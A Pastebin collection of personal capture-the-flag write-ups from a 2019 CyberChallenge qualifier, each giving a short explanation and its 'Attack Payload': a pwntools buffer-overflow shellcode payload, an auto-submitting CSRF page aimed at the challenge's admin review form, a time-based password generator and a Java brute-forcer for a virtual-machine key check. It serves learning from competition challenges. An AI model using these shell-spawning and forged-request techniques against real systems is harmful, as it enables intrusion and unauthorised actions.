Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- NOTICE:
- My english is fuckin bad, PLUS I wrote this in like 20 mins. Sorry if I fucked up badly all the grammar :(
- Open this page with desktop-view to enjoy ASCII arts! :D
- ██╗ ██╗███╗ ██╗██╗ ██╗███████╗
- ██║ ██║████╗ ██║██║ ██╔╝██╔════╝
- ██║ ██║██╔██╗ ██║█████╔╝ ███████╗
- ██║ ██║██║╚██╗██║██╔═██╗ ╚════██║
- ███████╗██║██║ ╚████║██║ ██╗███████║
- ╚══════╝╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝
- Instagram: https://instagram.com/stranck/
- Telegram shitpost channel: https://t.me/Stranck
- YouTube channel: https://www.youtube.com/channel/UCmMWUz0QZ7WhIBx-1Dz-IGg
- ██████╗ ██████╗ ██████╗ ██████╗
- ██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗
- ██║ ██║██║ ██║██║ ██║██████╔╝
- ██║ ██║██║ ██║██║ ██║██╔══██╗
- ██████╔╝╚██████╔╝╚██████╔╝██║ ██║
- ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝
- CHALL Write-Up
- --------------
- Lol I executed the command lmao
- Attack Payload
- --------------
- ncat door.quals.cyberchallenge.it 1111
- ███████╗ ██████╗ ██████╗
- ██╔════╝██╔═══██╗██╔══██╗
- ███████╗██║ ██║██████╔╝
- ╚════██║██║ ██║██╔═══╝
- ███████║╚██████╔╝██║
- ╚══════╝ ╚═════╝ ╚═╝
- CHALL Write-Up
- --------------
- I downloaded the executable to test it locally, and one of the first thing I tried was to get a segmentation fault by inputting a long sequence characters. It worked. So I opened in gdb and IDA and I started to reverse the code and I noticed that at the end of the program the execution returns to 0x100100. Using GDB I noticed that the input was placed at 0x1000000: hell yeah, an easy way to do a buffer overflow :D
- I tried putting my shellcode (to get a shell) payload at 0x100100 but it didn't worked, seems like it was cutting my input. So at 0x100100 I tried putting a jump to 0x100000 and putting the payload there, but it didn't worked because python is a fucking dumbass. Instead I've put a fantastic push to the stack with the address 0x100000 and then a return instruction... It worked! :DD
- Attack Payload
- --------------
- */
- from pwn import *
- import sys
- pl = asm(shellcraft.sh())
- # Don't waste A presses. Pannen won't be happy :(
- s = pl + 'b' * (0x100 - len(pl)) + asm('push 0x100000') + asm('ret')
- print s
- /*
- ███╗ ██╗███████╗ █████╗ ██████╗ █████╗ ██████╗ ███████╗███████╗██████╗ ███████╗
- ████╗ ██║██╔════╝██╔══██╗ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝██╔══██╗██╔════╝
- ██╔██╗ ██║███████╗███████║ ██║ ███████║██████╔╝█████╗ █████╗ ██████╔╝███████╗
- ██║╚██╗██║╚════██║██╔══██║ ██║ ██╔══██║██╔══██╗██╔══╝ ██╔══╝ ██╔══██╗╚════██║
- ██║ ╚████║███████║██║ ██║███████╗╚██████╗██║ ██║██║ ██║███████╗███████╗██║ ██║███████║
- ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚══════╝╚═╝ ╚═╝╚══════╝
- CHALL Write-Up
- --------------
- The first thing I noticed was that the admin wouldn't open any links outside 10.27.x.x
- So I thought "What if I host a webserver?"
- So I did using python -m http.server and checking the logs I've seen that 10.27.0.1 was loading the web-pages I was hosting. Then I've put a redirect in js to another url and by checking again the logs I noticed that the admin requested also that page: this means he was executing the js code! I tried creating an iFrame to the original page, but obv the xss detector stopped my js code from accessing it. Then an idea came into my mind:
- I've copied the form from the original page, inside mine but with the action tag pointing to the real submit page. Then I wrote some js code to "compile" automatically the form and submit it, assuming that the admin was already logged. And boom, goteeeeeeeem!
- Attack Payload
- --------------
- */
- <html>
- <body>
- <!-->iframe src="http://nsacareers.quals.cyberchallenge.it/review/00deb0dc-9c6d-4608-8f66-07add4775fbd?hire=hired!" id = "asd">
- </iframe-->
- <form method="POST" action = "http://nsacareers.quals.cyberchallenge.it/review/00deb0dc-9c6d-4608-8f66-07add4775fbd">
- <input type="checkbox" name="hire" value="hired!"> Hire
- <br class="mb-2">
- <input type="submit" value="Submit">
- </form>
- <script>
- //setTimeout(function(){
- /*try{
- var frame = document.getElementById("asd");
- var inner = frame.contentDocument || frame.contentWindow.document;
- inner.getElementsByTagName("input")[0].setAttribute("checked", "");
- inner.getElementsByTagName("form")[0].submit();
- } catch (asd){}*/
- //document.getElementByT
- document.getElementsByTagName("input")[0].setAttribute("checked", "")
- document.getElementsByTagName("input")[1].click()
- //location.replace("done.html");
- //}, 3000);
- </script>
- </body>
- </html>
- /*
- ████████╗██╗███╗ ███╗███████╗
- ╚══██╔══╝██║████╗ ████║██╔════╝
- ██║ ██║██╔████╔██║█████╗
- ██║ ██║██║╚██╔╝██║██╔══╝
- ██║ ██║██║ ╚═╝ ██║███████╗
- ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝
- CHALL Write-Up
- --------------
- I downloaded the two keys and I used them to access the server. I downloaded from it the executable (time) and the other file. I executed time and I inputted some random strings. He gave me an error. I assumed that the string in the other file was the password, so I inputted it and this time I didn't get an error, but it was waiting again for a String. Time to reverse! :D
- I opened the file in IDA and I noticed the "check1" and "check2" functions. I digged inside check2 and I noticed that there was a compare, between the inputted string and the result of another function: I opened it with the C view, noticing some C-standard calls (time & stuff) and a calc with the different time values. I copied the calc in a .c file, added some stuff and.... It didn't wokred, even if it should had worked. I checked what time it was on the server, noticing that it was in the PDT timezone. After some tries, I changed my pc to that timezone too (Changing it directly with PDT doesn't work :C) and... It didn't worked too. BUT after a while I executed it again and this time it worked(?????). Probably it was for the time not being exactly syncronized
- Attack Payload
- --------------
- */
- #include <stdio.h>
- #include <time.h>
- int main () {
- time_t rawtime;
- struct tm *v3;
- rawtime = time(0LL);
- v3 = localtime( &rawtime );
- /*struct tm *v3;
- time_t t = time(0LL);
- v3 = localtime(&t);*/
- long l = v3->tm_hour + v3->tm_min + (v3->tm_year + v3->tm_mon - v3->tm_mday) / (v3->tm_min + 1) + 3735928559LL;
- printf("AoHnikoj7L2fVn41\n%o\n", l);
- }
- /*
- ███████╗███████╗██╗ ██╗███╗ ███╗
- ██╔════╝╚══███╔╝██║ ██║████╗ ████║
- █████╗ ███╔╝ ██║ ██║██╔████╔██║
- ██╔══╝ ███╔╝ ╚██╗ ██╔╝██║╚██╔╝██║
- ███████╗███████╗ ╚████╔╝ ██║ ╚═╝ ██║
- ╚══════╝╚══════╝ ╚═══╝ ╚═╝ ╚═╝
- CHALL Write-Up
- --------------
- TODO
- Attack Payload
- --------------
- */
- package ovh.stranck.cyberchallenge.ezVM;
- import java.nio.file.Files;
- import java.nio.file.Paths;
- import java.util.ArrayList;
- import java.util.Arrays;
- import java.util.Scanner;
- import ovh.stranck.ctf.App;
- import ovh.stranck.utils.PatternBruteforcer;
- public class Main {
- public static final short NOP = 0x00;
- public static final short IN = 0x01;
- public static final short STO = 0x02;
- public static final short ADD = 0x03;
- public static final short SUB = 0x04;
- public static final short NOT = 0x05;
- public static final short AND = 0x06;
- public static final short OR = 0x07;
- public static final short XOR = 0x08;
- public static final short CHK = 0x09;
- public static final boolean PRINT = false;
- public static Scanner sc = new Scanner(System.in);
- public static byte[] m = new byte[256];
- public static byte[] p = null;
- public static int pc = 0;
- public static String bruteforceRead;
- public static ArrayList<String> attemps1 = new ArrayList<String>();
- public static ArrayList<String> attemps2 = new ArrayList<String>();
- public static void main(String[] args) throws Exception{
- //618
- //p = Files.readAllBytes(Paths.get(args[0]));
- p = Files.readAllBytes(Paths.get("C:\\Users\\Luca\\Desktop\\shit\\programming\\CTF\\CyberChallenge 2019\\EzVM\\check_login_key"));
- // execute();
- /*PatternBruteforcer pbf = new PatternBruteforcer("@ABCDEFGHIJKLMNO", 4, true);
- String s = "@@@@", base1 = "@DOO-KOOO-@@@N-@IOO-", base2 = "";
- //while(!(s = pbf.next()).equals("")){
- for(int i = 0; i < m.length; i++)
- m[i] = 0;
- pc = 0;
- bruteforceRead = base1 + s + base2;
- execute();
- if(pc > 618){
- attemps1.add(bruteforceRead);
- }
- //}
- System.out.println(attemps1.toString());*/
- int[] pc = {259, 346, 440, 526, 618};
- String[] segment = {"@@@@", "@@@@", "@@@@", "@@@@", "@@@@"};
- bruteforce(pc, segment, 0);
- }
- public static void bruteforce(int[] pc, String[] segment, int level){
- PatternBruteforcer pbf = new PatternBruteforcer("@ABCDEFGHIJKLMNO", 4, true);
- String s;//, base1 = "@DOO-KOOO-@@@N-@IOO-", base2 = "";
- while(!(s = pbf.next()).equals("")){
- //App.wait(1);
- for(int i = 0; i < m.length; i++)
- m[i] = 0;
- Main.pc = 0;
- String before = "", after = "";
- for(int i = 0; i < level; i++){
- before += segment[i] + "-";
- //System.out.println(i + " " + level + " " + before);
- }
- for(int i = level + 1; i < pc.length; i++){
- after += "-" + segment[i];
- //System.out.println(after);
- }
- bruteforceRead = before + s + after;
- //System.out.println(bruteforceRead);
- if(execute() == 0){
- System.out.println("FOUND: " + bruteforceRead);
- } else {
- if(Main.pc > pc[level]){
- if(level + 1 < pc.length){
- segment[level] = s;
- bruteforce(pc, segment, level + 1);
- }
- }
- }
- }
- }
- public static int execute() {
- int ret = 0;
- loop:
- while(pc < p.length){
- if(PRINT) System.out.print(pc + ":\t");
- switch(p[pc++]){
- case NOP: {
- nop();
- break;
- }
- case IN: {
- in();
- break;
- }
- case STO: {
- sto();
- break;
- }
- case ADD: {
- add();
- break;
- }
- case SUB: {
- sub();
- break;
- }
- case NOT: {
- not();
- break;
- }
- case AND: {
- and();
- break;
- }
- case OR: {
- or();
- break;
- }
- case XOR: {
- xor();
- break;
- }
- case CHK: {
- ret = chk();
- if(ret == 1) {
- if(PRINT) System.out.println("Exiting at: " + pc);
- break loop;
- }
- break;
- }
- default: {
- if(PRINT) System.out.println(p[pc - 1] + ":\tCommand not found");
- }
- }
- }
- return ret;
- }
- public static void nop(){
- if(PRINT) System.out.println("NOP");
- }
- public static void in(){
- short length = (short)(p[pc++] & 0xff);
- short mem = (short)(p[pc++] & 0xff);
- if(PRINT) System.out.println("IN " + length + " " + mem);
- //System.out.print(length + ">\t");
- //String in = sc.nextLine();
- String in = bruteforceRead;
- in = in.substring(0, length);
- byte[] b = in.getBytes();
- for(int i = 0; i < b.length; i++)
- m[mem++] = b[i];
- }
- public static void sto(){
- byte b = p[pc++];
- //short b = (short)(p[pc++] & 0xff);
- short mem = (short)(p[pc++] & 0xff);
- if(PRINT) System.out.println("STO " + (short)(b & 0xff) + " " + mem);
- m[mem] = b;
- //m[mem] = m[b];
- }
- public static void add(){
- short x = (short)(p[pc++] & 0xff);
- short y = (short)(p[pc++] & 0xff);
- short z = (short)(p[pc++] & 0xff);
- if(PRINT) System.out.println("ADD " + x + " " + y + " " + z);
- m[z] = (byte) (m[x] + m[y]);
- }
- public static void sub(){
- short x = (short)(p[pc++] & 0xff);
- short y = (short)(p[pc++] & 0xff);
- short z = (short)(p[pc++] & 0xff);
- if(PRINT) System.out.println("SUB " + x + " " + y + " " + z);
- m[z] = (byte) (m[x] - m[y]);
- }
- public static void not(){
- short mem = (short)(p[pc++] & 0xff);
- if(PRINT) System.out.println("NOT " + mem);
- m[mem] = (byte) ~m[mem];
- }
- public static void and(){
- short x = (short)(p[pc++] & 0xff);
- short y = (short)(p[pc++] & 0xff);
- short z = (short)(p[pc++] & 0xff);
- if(PRINT) System.out.println("AND " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
- m[z] = (byte) (m[x] & m[y]);
- }
- public static void or(){
- short x = (short)(p[pc++] & 0xff);
- short y = (short)(p[pc++] & 0xff);
- short z = (short)(p[pc++] & 0xff);
- if(PRINT) System.out.println("OR " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
- m[z] = (byte) (m[x] | m[y]);
- }
- public static void xor(){
- short x = (short)(p[pc++] & 0xff);
- short y = (short)(p[pc++] & 0xff);
- short z = (short)(p[pc++] & 0xff);
- if(PRINT) System.out.println("XOR " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
- m[z] = (byte) (m[x] ^ m[y]);
- }
- public static int chk(){
- short x = (short)(p[pc++] & 0xff);
- short y = (short)(p[pc++] & 0xff);
- if(PRINT) System.out.println("CHK " + x + " " + y + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
- if(m[x] != m[y])
- return 1;
- return 0;
- }
- }
- package ovh.stranck.utils;
- public class PatternBruteforcer {
- private String charset;
- private boolean overflow = false;
- private int index[];
- private int length;
- public PatternBruteforcer(String charset, int length, boolean fixedLength){
- this.charset = charset;
- this.length = length;
- index = new int[length];
- index[0] = -1;
- for(int i = 1; !fixedLength && i < length; i++)
- index[i] = -1;
- }
- public String getCurrent(boolean of){
- String s = "";
- for(int n = 0; !of && n < length; n++)
- if(index[n] >= 0)
- s = charset.charAt(index[n]) + s;
- return s;
- }
- public synchronized String next(){
- if(!this.overflow){
- boolean overflow = true;
- for(int i = 0; i < length && overflow; i++){
- if(++index[i] >= charset.length()){
- index[i] = 0;
- overflow = true;
- } else {
- overflow = false;
- }
- }
- this.overflow = overflow;
- }
- return getCurrent(overflow);
- }
- public boolean isDone(){
- return overflow;
- }
- public static void bruteforceFromCharsetLength(String charset, int length, boolean fixedLength, Action a){
- int[] index = new int[length];
- index[0] = -1;
- for(int i = 1; !fixedLength && i < length; i++)
- index[i] = -1;
- boolean overflow = false;
- while(!overflow){
- overflow = true;
- for(int i = 0; i < length && overflow; i++){
- if(++index[i] >= charset.length()){
- index[i] = 0;
- overflow = true;
- //System.out.println("overflow! INDEX of: " + i + "\tVALUE: " + index[i]);
- } else {
- overflow = false;
- //System.out.println("INDEX of: " + i + "\tVALUE: " + index[i]);
- String s = "";
- for(int n = 0; n < length; n++){
- //System.out.println("adding INDEX of: " + n + "\tVALUE: " + index[n]);
- if(index[n] >= 0)
- s = charset.charAt(index[n]) + s;
- }
- a.execute(s);
- }
- }
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement